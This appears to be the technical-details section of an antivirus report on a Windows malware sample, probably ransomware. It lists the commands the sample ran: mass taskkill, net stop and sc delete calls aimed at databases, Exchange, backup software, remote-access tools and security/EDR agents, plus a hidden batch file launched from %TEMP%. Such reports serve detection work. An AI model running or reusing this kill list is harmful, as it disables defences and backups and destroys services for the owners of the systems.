Техническая информация
- '<SYSTEM32>\net.exe' stop U8WorkerService1
- '<SYSTEM32>\taskkill.exe' /IM RavTray.exe /F
- '<SYSTEM32>\taskkill.exe' /IM node.exe /F
- '<SYSTEM32>\taskkill.exe' /IM ssms.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SecureCRT.exe /F
- '<SYSTEM32>\taskkill.exe' /IM pvlsvr.exe /F
- '<SYSTEM32>\taskkill.exe' /IM wampmanager.exe /F
- '<SYSTEM32>\taskkill.exe' /IM bedbg.exe /F
- '<SYSTEM32>\taskkill.exe' /IM nginx.exe /F
- '<SYSTEM32>\taskkill.exe' /IM rdm.exe /F
- '<SYSTEM32>\taskkill.exe' /IM beserver.exe /F
- '<SYSTEM32>\taskkill.exe' /IM RsTray.exe /F
- '<SYSTEM32>\taskkill.exe' /IM wrapper.exe /F
- '<SYSTEM32>\net.exe' stop UTUService
- '<SYSTEM32>\net.exe' stop UFReportService
- '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
- '<SYSTEM32>\taskkill.exe' /IM yundetectservice.exe /F
- '<SYSTEM32>\taskkill.exe' /IM GNAupdaemon.exe /F
- '<SYSTEM32>\taskkill.exe' /IM sshd.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SyncBaseSvr.exe /F
- '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
- '<SYSTEM32>\taskkill.exe' /IM VirtualBoxVM.exe /F
- '<SYSTEM32>\taskkill.exe' /IM ssclient.exe /F
- '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
- '<SYSTEM32>\taskkill.exe' /IM iempwatchdog.exe /F
- '<SYSTEM32>\net.exe' stop UFAllNet
- '<SYSTEM32>\taskkill.exe' /IM VBoxSVC.exe /F
- '<SYSTEM32>\taskkill.exe' /IM sqlmangr.exe /F
- '<SYSTEM32>\taskkill.exe' /IM vm-tray.exe /F
- '<SYSTEM32>\taskkill.exe' /IM baidunetdisk.exe /F
- '<SYSTEM32>\taskkill.exe' /IM VirtualBox.exe /F
- '<SYSTEM32>\taskkill.exe' /IM beremote.exe /F
- '<SYSTEM32>\taskkill.exe' /IM mssearch.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SecureCRTPortable.exe /F
- '<SYSTEM32>\taskkill.exe' /IM vmtoolsd.exe /F
- '<SYSTEM32>\net.exe' stop U8WebPool
- '<SYSTEM32>\taskkill.exe' /IM eSightService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM CasLicenceServer.exe /F
- '<SYSTEM32>\net.exe' stop U8DispatchService
- '<SYSTEM32>\net.exe' stop NFSysService
- '<SYSTEM32>\taskkill.exe' /IM BackupExecManagementService.exe /F
- '<SYSTEM32>\net.exe' stop TurboCRM70
- '<SYSTEM32>\taskkill.exe' /IM CCenter.exe /F
- '<SYSTEM32>\taskkill.exe' /IM fdlauncher.exe /F
- '<SYSTEM32>\taskkill.exe' /IM vm-agent-daemon.exe /F
- '<SYSTEM32>\taskkill.exe' /IM fdhost.exe /F
- '<SYSTEM32>\taskkill.exe' /IM TeamViewer.exe /F
- '<SYSTEM32>\net.exe' stop SentinelKeysServer
- '<SYSTEM32>\net.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
- '<SYSTEM32>\net.exe' stop AgentX
- '<SYSTEM32>\net.exe' stop "Apple Mobile Device Service"
- '<SYSTEM32>\net.exe' stop DGPNPSEV
- '<SYSTEM32>\net.exe' stop U8KeyManagePool
- '<SYSTEM32>\net.exe' stop U8TaskService
- '<SYSTEM32>\net.exe' stop U8EISService
- '<SYSTEM32>\net.exe' stop U8SLReportService
- '<SYSTEM32>\taskkill.exe' /IM tv_x64.exe /F
- '<SYSTEM32>\taskkill.exe' /IM benetns.exe /F
- '<SYSTEM32>\net.exe' stop U8SCMPool
- '<SYSTEM32>\net.exe' stop U8MPool
- '<SYSTEM32>\taskkill.exe' /IM d_manage.exe /F
- '<SYSTEM32>\taskkill.exe' /IM softmgrlite.exe /F
- '<SYSTEM32>\taskkill.exe' /IM cygrunsrv.exe /F
- '<SYSTEM32>\taskkill.exe' /IM reportingservicesservice.exe /F
- '<SYSTEM32>\taskkill.exe' /IM tv_w32.exe /F
- '<SYSTEM32>\net.exe' stop U8GCService
- '<SYSTEM32>\taskkill.exe' /IM bengine.exe /F
- '<SYSTEM32>\net.exe' stop U8EncryptService
- '<SYSTEM32>\taskkill.exe' /IM ScanFrm.exe /F
- '<SYSTEM32>\net.exe' stop NFOTPService
- '<SYSTEM32>\taskkill.exe' /IM abs_deployer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM php.exe /F
- '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
- '<SYSTEM32>\taskkill.exe' /IM Tencentdll.exe /F
- '<SYSTEM32>\taskkill.exe' /IM DisklessServer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM JhTask.exe /F
- '<SYSTEM32>\taskkill.exe' /IM IDDAService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchange.NodeService.ein /F
- '<SYSTEM32>\taskkill.exe' /IM TXPlatform.exe /F
- '<SYSTEM32>\taskkill.exe' /IM IcafeServicesTray.exe /F
- '<SYSTEM32>\taskkill.exe' /IM ControlServer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM AutoDealService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchangeService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM BsAgent_0.exe /F
- '<SYSTEM32>\taskkill.exe' /IM His6Service.exe /F
- '<SYSTEM32>\taskkill.exe' /IM fppdis5.exe /F
- '<SYSTEM32>\taskkill.exe' /IM WeChat.exe /F
- '<SYSTEM32>\taskkill.exe' /IM dinotify.exe /F
- '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM perl.exe /F
- '<SYSTEM32>\taskkill.exe' /IM TransMain.exe /F
- '<SYSTEM32>\taskkill.exe' /IM service_agent.exe /F
- '<SYSTEM32>\taskkill.exe' /IM AndroidServer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM DAService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM QQ.exe /F
- '<SYSTEM32>\taskkill.exe' /IM TsServer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM PersonUDisk.exe /F
- '<SYSTEM32>\taskkill.exe' /IM Executer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM EnergyDataService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM emagent.exe /F
- '<SYSTEM32>\taskkill.exe' /IM jenkins.exe /F
- '<SYSTEM32>\taskkill.exe' /IM NetDiskServer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM AllPassCBHost.exe /F
- '<SYSTEM32>\taskkill.exe' /IM MPService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM DumpServer.exe /F
- '<SYSTEM32>\taskkill.exe' /IM ap_nginx.exe /F
- '<SYSTEM32>\taskkill.exe' /IM UIODetect.exe /F
- '<SYSTEM32>\taskkill.exe' /IM oravssw.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SOUNDMAN.exe /F
- '<SYSTEM32>\taskkill.exe' /IM ipc_proxy.exe /F
- '<SYSTEM32>\taskkill.exe' /IM GoodGameSrv.exe /F
- '<SYSTEM32>\taskkill.exe' /IM igfxHK.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SyncBaseConsole.exe /F
- '<SYSTEM32>\taskkill.exe' /IM "phpStudy.exe" /F
- '<SYSTEM32>\taskkill.exe' /IM aspnet_state.exe /F
- '<SYSTEM32>\taskkill.exe' /IM sfupdatemgr.exe /F
- '<SYSTEM32>\taskkill.exe' /IM igfxEM.exe /F
- '<SYSTEM32>\taskkill.exe' /IM TNSLSNR.exe /F
- '<SYSTEM32>\taskkill.exe' /IM "notepad++.exe" /F
- '<SYSTEM32>\taskkill.exe' /IM edr_monitor.exe /F
- '<SYSTEM32>\taskkill.exe' /IM RemoteAssistProcess.exe /F
- '<SYSTEM32>\taskkill.exe' /IM RAVCp164.exe /F
- '<SYSTEM32>\taskkill.exe' /IM BarMoniService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM igfxTray.exe /F
- '<SYSTEM32>\taskkill.exe' /IM OPCClient.exe /F
- '<SYSTEM32>\taskkill.exe' /IM BarCMService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxMonitorService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM GNCEFExternal.exe /F
- '<SYSTEM32>\taskkill.exe' /IM BarServerView.exe /F
- '<SYSTEM32>\taskkill.exe' /IM PrivacyIconClient.exe /F
- '<SYSTEM32>\taskkill.exe' /IM MySQLNotifier.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SunloginClient.exe /F
- '<SYSTEM32>\taskkill.exe' /IM sfavsvc.exe /F
- '<SYSTEM32>\taskkill.exe' /IM GoodGame.exe /F
- '<SYSTEM32>\taskkill.exe' /IM redis-server.exe /F
- '<SYSTEM32>\taskkill.exe' /IM edr_agent.exe /F
- '<SYSTEM32>\taskkill.exe' /IM SupportAssistAgent.exe /F
- '<SYSTEM32>\taskkill.exe' /IM edr_sec_plan.exe /F
- '<SYSTEM32>\taskkill.exe' /IM TsService.exe /F
- '<SYSTEM32>\taskkill.exe' /IM 360bdoctor.exe /F
- '<SYSTEM32>\taskkill.exe' /IM AutoBackUpEx.exe /F
- '<SYSTEM32>\taskkill.exe' /IM navicat.exe /F
- '<SYSTEM32>\net.exe' stop Mysoft.SchedulingService
- '<SYSTEM32>\taskkill.exe' /IM AppMain.exe /F
- '<SYSTEM32>\taskkill.exe' /IM mdm.exe /F
- '<SYSTEM32>\net.exe' stop GNWebService
- '<SYSTEM32>\net.exe' stop AdobeARMservice
- '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
- '<SYSTEM32>\net.exe' stop CASWebServer
- '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
- '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
- '<SYSTEM32>\net.exe' stop CASLicenceServer
- '<SYSTEM32>\net.exe' stop AutoUpdateService
- '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
- '<SYSTEM32>\net.exe' stop QPCore
- '<SYSTEM32>\net.exe' stop Service2
- '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
- '<SYSTEM32>\net.exe' stop TeamViewer
- '<SYSTEM32>\net.exe' stop JWService
- '<SYSTEM32>\net.exe' stop MSExchangeDelivery
- '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
- '<SYSTEM32>\net.exe' stop MSExchangeImap4
- '<SYSTEM32>\net.exe' stop RapService
- '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
- '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
- '<SYSTEM32>\net.exe' stop MSExchangeIS
- '<SYSTEM32>\net.exe' stop AGSService
- '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
- '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
- '<SYSTEM32>\net.exe' stop CASXMLService
- '<SYSTEM32>\net.exe' stop Tomcat8
- '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
- '<SYSTEM32>\net.exe' stop "AliyunService"
- '<SYSTEM32>\net.exe' stop VeeamTransportSvc
- '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
- '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
- '<SYSTEM32>\net.exe' stop VeeanBackupSvc
- '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
- '<SYSTEM32>\net.exe' stop MSExchangeHM
- '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
- '<SYSTEM32>\net.exe' stop JWRinfoClientService
- '<SYSTEM32>\net.exe' stop VMAuthdService
- '<SYSTEM32>\net.exe' stop VMUSBArbService
- '<SYSTEM32>\net.exe' stop Realtek11nSU
- '<SYSTEM32>\net.exe' stop "memcached Server"
- '<SYSTEM32>\net.exe' stop TeamViewer8
- '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
- '<SYSTEM32>\net.exe' stop U8WorkerService2
- '<SYSTEM32>\net.exe' stop Apache2.4
- '<SYSTEM32>\net.exe' stop VMwareHostd
- '<SYSTEM32>\net.exe' stop UIODetect
- '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
- '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
- '<SYSTEM32>\net.exe' stop HaoZipSvc
- '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
- '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
- '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
- '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
- '<SYSTEM32>\net.exe' stop "VMware NAT Service"
- '<SYSTEM32>\net.exe' stop UFIDAWebService
- '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
- '<SYSTEM32>\net.exe' stop MSExchangeCompliance
- '<SYSTEM32>\net.exe' stop VMnetDHCP
- '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
- '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
- '<SYSTEM32>\net.exe' stop mysqltransport
- '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
- '<SYSTEM32>\net.exe' stop DellDRLogSvc
- '<SYSTEM32>\net.exe' stop MSExchangeADTopology
- '<SYSTEM32>\net.exe' stop WebAttendServer
- '<SYSTEM32>\net.exe' stop Apache2.2
- '<SYSTEM32>\net.exe' stop MSComplianceAudit
- '<SYSTEM32>\net.exe' stop wanxiao-monitor
- '<SYSTEM32>\net.exe' stop XenSvc
- '<SYSTEM32>\net.exe' stop xenlite
- '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
- '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
- '<SYSTEM32>\net.exe' stop DDNSService
- '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
- '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
- '<SYSTEM32>\net.exe' stop K3MMainSuspendService
- '<SYSTEM32>\net.exe' stop IngressMgr
- '<SYSTEM32>\net.exe' stop SupportAssistAgent
- '<SYSTEM32>\net.exe' stop DFServ
- '<SYSTEM32>\net.exe' stop MSExchangeUMCR
- '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
- '<SYSTEM32>\net.exe' stop OMAILREPORT
- '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
- '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
- '<SYSTEM32>\net.exe' stop NFLicenceServer
- '<SYSTEM32>\net.exe' stop MySQL5_OA
- '<SYSTEM32>\net.exe' stop ImtsEventSvr
- '<SYSTEM32>\net.exe' stop RavService
- '<SYSTEM32>\net.exe' stop d_safe
- '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
- '<SYSTEM32>\net.exe' stop RTCAVMCU
- '<SYSTEM32>\taskkill.exe' /IM SogouImeBroker.exe /F
- '<SYSTEM32>\net.exe' stop U8SendMailAdmin
- '<SYSTEM32>\net.exe' stop CobianBackup10
- '<SYSTEM32>\taskkill.exe' /IM vm-agent.exe /F
- '<SYSTEM32>\taskkill.exe' /IM TeamViewer_Service.exe /F
- '<SYSTEM32>\taskkill.exe' /IM java.exe /F
- '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
- '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
- '<SYSTEM32>\net.exe' stop KugouService
- '<SYSTEM32>\net.exe' stop NFVPrintServer
- '<SYSTEM32>\net.exe' stop ceng_web_svc_d
- '<SYSTEM32>\net.exe' stop K3ClouManager
- '<SYSTEM32>\net.exe' stop KpService
- '<SYSTEM32>\net.exe' stop EvtSys
- '<SYSTEM32>\net.exe' stop pcas
- '<SYSTEM32>\net.exe' stop DDVRulesProcessor
- '<SYSTEM32>\net.exe' stop AngelOfDeath
- '<SYSTEM32>\net.exe' stop MSExchangeUM
- '<SYSTEM32>\net.exe' stop MSExchangeRepl
- '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
- '<SYSTEM32>\net.exe' stop VeeamMountSvc
- '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
- '<SYSTEM32>\net.exe' stop CASMsgSrv
- '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
- '<SYSTEM32>\net.exe' stop VeeamCloudSvc
- '<SYSTEM32>\net.exe' stop CASVirtualDiskService
- '<SYSTEM32>\net.exe' stop VeeamDeploySvc
- '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
- '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
- '<SYSTEM32>\net.exe' stop VeeamNFSSvc
- '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
- '<SYSTEM32>\net.exe' stop MSExchangePop3
- '<SYSTEM32>\net.exe' stop MSExchangeRPC
- '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
- '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
- '<SYSTEM32>\net.exe' stop "FileZilla Server"
- '<SYSTEM32>\net.exe' stop 360EntPGSvc
- '<SYSTEM32>\net.exe' stop RavTask
- '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
- '<SYSTEM32>\net.exe' stop K3MobileServiceManage
- '<SYSTEM32>\net.exe' stop ClickToRunSvc
- '<SYSTEM32>\net.exe' stop MSExchangeTransport
- '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
- '<SYSTEM32>\net.exe' stop MSExchangeThrottling
- '<SYSTEM32>\net.exe' stop MySQL
- '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
- '<SYSTEM32>\net.exe' stop ServiceMid
- '<SYSTEM32>\net.exe' stop MSExchangeSubmission
- '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
- '<SYSTEM32>\net.exe' stop tmlisten
- '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
- '<SYSTEM32>\net.exe' stop "Bonjour Service"
- '<SYSTEM32>\taskkill.exe' /IM HaoZip.exe /F
- %TEMP%\4346.tmp\4347.tmp\4348.bat
- %TEMP%\4346.tmp\4347.tmp\4348.bat
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4346.tmp\4347.tmp\4348.bat <Полный путь к файлу>"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4346.tmp\4347.tmp\4348.bat <Полный путь к файлу>"
- '<SYSTEM32>\sc.exe' delete GPSUserSvr
- '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
- '<SYSTEM32>\net1.exe' stop CASXMLService
- '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
- '<SYSTEM32>\sc.exe' delete msftesql
- '<SYSTEM32>\sc.exe' delete GPSDaemon
- '<SYSTEM32>\sc.exe' delete CobianBackup10
- '<SYSTEM32>\net1.exe' stop MSExchangeImap4
- '<SYSTEM32>\net1.exe' stop "AliyunService"
- '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
- '<SYSTEM32>\sc.exe' delete MSSEARCH
- '<SYSTEM32>\sc.exe' delete OracleRemExecService
- '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
- '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
- '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
- '<SYSTEM32>\sc.exe' delete wampapache
- '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
- '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
- '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
- '<SYSTEM32>\sc.exe' delete "OSP Service"
- '<SYSTEM32>\sc.exe' delete NFWebServer
- '<SYSTEM32>\sc.exe' delete vmware-converter-worker
- '<SYSTEM32>\sc.exe' delete LPManager
- '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
- '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
- '<SYSTEM32>\sc.exe' delete 360EntClientSvc
- '<SYSTEM32>\sc.exe' delete vmware-converter-server
- '<SYSTEM32>\sc.exe' delete BestSyncSvc
- '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
- '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
- '<SYSTEM32>\sc.exe' delete QQCertificateService
- '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
- '<SYSTEM32>\net1.exe' stop MSExchangePop3
- '<SYSTEM32>\sc.exe' delete GPSDownSvr
- '<SYSTEM32>\sc.exe' delete GPSMysqld
- '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
- '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
- '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
- '<SYSTEM32>\sc.exe' delete GPSTomcat6
- '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
- '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
- '<SYSTEM32>\sc.exe' delete GPSLoginSvr
- '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
- '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
- '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
- '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
- '<SYSTEM32>\sc.exe' delete GPSMediaSvr
- '<SYSTEM32>\sc.exe' delete ErpEnvSvc
- '<SYSTEM32>\sc.exe' delete LMS
- '<SYSTEM32>\net1.exe' stop DDNSService
- '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
- '<SYSTEM32>\sc.exe' delete TbossSystem
- '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
- '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
- '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
- '<SYSTEM32>\sc.exe' delete semwebsrv
- '<SYSTEM32>\net1.exe' stop RapService
- '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
- '<SYSTEM32>\sc.exe' delete GPSStorageSvr
- '<SYSTEM32>\sc.exe' delete SQLService
- '<SYSTEM32>\net1.exe' stop MSExchangeIS
- '<SYSTEM32>\net1.exe' stop AGSService
- '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
- '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
- '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
- '<SYSTEM32>\sc.exe' delete CASLicenceServer
- '<SYSTEM32>\sc.exe' delete 360EntSvc
- '<SYSTEM32>\net1.exe' stop Service2
- '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
- '<SYSTEM32>\sc.exe' delete MsDtsServer100
- '<SYSTEM32>\sc.exe' delete AppFabricCachingService
- '<SYSTEM32>\net1.exe' stop TeamViewer
- '<SYSTEM32>\net1.exe' stop JWService
- '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
- '<SYSTEM32>\sc.exe' delete Jenkins
- '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
- '<SYSTEM32>\sc.exe' delete c2wts
- '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
- '<SYSTEM32>\sc.exe' delete SSSyncService
- '<SYSTEM32>\sc.exe' delete apachezt
- '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
- '<SYSTEM32>\sc.exe' delete ProjectCalcService16
- '<SYSTEM32>\sc.exe' delete secbizsrv
- '<SYSTEM32>\net1.exe' stop Tomcat8
- '<SYSTEM32>\sc.exe' delete SSMonitorService
- '<SYSTEM32>\sc.exe' delete eSightService
- '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
- '<SYSTEM32>\sc.exe' delete MMRHookService
- '<SYSTEM32>\sc.exe' delete OSearch16
- '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
- '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
- '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
- '<SYSTEM32>\sc.exe' delete OpenSSHd
- '<SYSTEM32>\sc.exe' delete kbasesrv
- '<SYSTEM32>\sc.exe' delete SPTraceV4
- '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
- '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
- '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
- '<SYSTEM32>\net1.exe' stop JWRinfoClientService
- '<SYSTEM32>\sc.exe' delete smtpsvrJT
- '<SYSTEM32>\sc.exe' delete vmware-converter-agent
- '<SYSTEM32>\net1.exe' stop QPCore
- '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
- '<SYSTEM32>\net1.exe' stop AutoUpdateService
- '<SYSTEM32>\net1.exe' stop AdobeARMservice
- '<SYSTEM32>\sc.exe' delete jhi_service
- '<SYSTEM32>\sc.exe' delete 360EntHttpServer
- '<SYSTEM32>\sc.exe' delete 2345PicSvc
- '<SYSTEM32>\sc.exe' delete VisualSVNServer
- '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
- '<SYSTEM32>\sc.exe' delete VirboxWebServer
- '<SYSTEM32>\sc.exe' delete zyb_sync
- '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
- '<SYSTEM32>\sc.exe' delete vsvnjobsvc
- '<SYSTEM32>\net1.exe' stop CASWebServer
- '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
- '<SYSTEM32>\net1.exe' stop MSExchangeHM
- '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
- '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
- '<SYSTEM32>\sc.exe' delete btPanel
- '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
- '<SYSTEM32>\net1.exe' stop CASLicenceServer
- '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
- '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
- '<SYSTEM32>\sc.exe' delete MSMQ
- '<SYSTEM32>\sc.exe' delete KMSELDI
- '<SYSTEM32>\sc.exe' delete MotionBoard57
- '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
- '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
- '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
- '<SYSTEM32>\sc.exe' delete KuaiYunTools
- '<SYSTEM32>\sc.exe' delete ADWS
- '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
- '<SYSTEM32>\sc.exe' delete RemoteAssistService
- '<SYSTEM32>\net1.exe' stop UFReportService
- '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
- '<SYSTEM32>\net1.exe' stop NFVPrintServer
- '<SYSTEM32>\sc.exe' delete NscAuthService
- '<SYSTEM32>\sc.exe' delete U8TaskService
- '<SYSTEM32>\net1.exe' stop ceng_web_svc_d
- '<SYSTEM32>\net1.exe' stop K3ClouManager
- '<SYSTEM32>\sc.exe' delete MASTER
- '<SYSTEM32>\sc.exe' delete U8SLReportService
- '<SYSTEM32>\sc.exe' delete FTA
- '<SYSTEM32>\sc.exe' delete U8SCMPool
- '<SYSTEM32>\net1.exe' stop KpService
- '<SYSTEM32>\net1.exe' stop EvtSys
- '<SYSTEM32>\sc.exe' delete RTCASMCU
- '<SYSTEM32>\sc.exe' delete "U8MPool"
- '<SYSTEM32>\net1.exe' stop K3MMainSuspendService
- '<SYSTEM32>\net1.exe' stop KugouService
- '<SYSTEM32>\net1.exe' stop IngressMgr
- '<SYSTEM32>\sc.exe' delete U8KeyManagePool
- '<SYSTEM32>\sc.exe' delete OfficeUpdateService
- '<SYSTEM32>\sc.exe' delete U8GCService
- '<SYSTEM32>\net1.exe' stop SupportAssistAgent
- '<SYSTEM32>\net1.exe' stop DFServ
- '<SYSTEM32>\sc.exe' delete asComSvc
- '<SYSTEM32>\sc.exe' delete U8EncryptService
- '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
- '<SYSTEM32>\net1.exe' stop RavService
- '<SYSTEM32>\sc.exe' delete "Daemon Service"
- '<SYSTEM32>\sc.exe' delete U8EISService
- '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
- '<SYSTEM32>\sc.exe' delete U8DispatchService
- '<SYSTEM32>\net1.exe' stop OMAILREPORT
- '<SYSTEM32>\sc.exe' delete RtcSrv
- '<SYSTEM32>\net1.exe' stop SentinelKeysServer
- '<SYSTEM32>\net1.exe' stop CASMsgSrv
- '<SYSTEM32>\sc.exe' delete UFAllNet
- '<SYSTEM32>\net1.exe' stop UFAllNet
- '<SYSTEM32>\net1.exe' stop U8WebPool
- '<SYSTEM32>\net1.exe' stop U8TaskService
- '<SYSTEM32>\net1.exe' stop U8SLReportService
- '<SYSTEM32>\net1.exe' stop U8SCMPool
- '<SYSTEM32>\net1.exe' stop U8MPool
- '<SYSTEM32>\net1.exe' stop U8KeyManagePool
- '<SYSTEM32>\net1.exe' stop U8GCService
- '<SYSTEM32>\net1.exe' stop U8EncryptService
- '<SYSTEM32>\net1.exe' stop U8EISService
- '<SYSTEM32>\net1.exe' stop NFOTPService
- '<SYSTEM32>\net1.exe' stop U8DispatchService
- '<SYSTEM32>\net1.exe' stop NFSysService
- '<SYSTEM32>\net1.exe' stop TurboCRM70
- '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
- '<SYSTEM32>\net1.exe' stop DGPNPSEV
- '<SYSTEM32>\net1.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
- '<SYSTEM32>\net1.exe' stop AgentX
- '<SYSTEM32>\net1.exe' stop "Apple Mobile Device Service"
- '<SYSTEM32>\net1.exe' stop Mysoft.SchedulingService
- '<SYSTEM32>\net1.exe' stop "Bonjour Service"
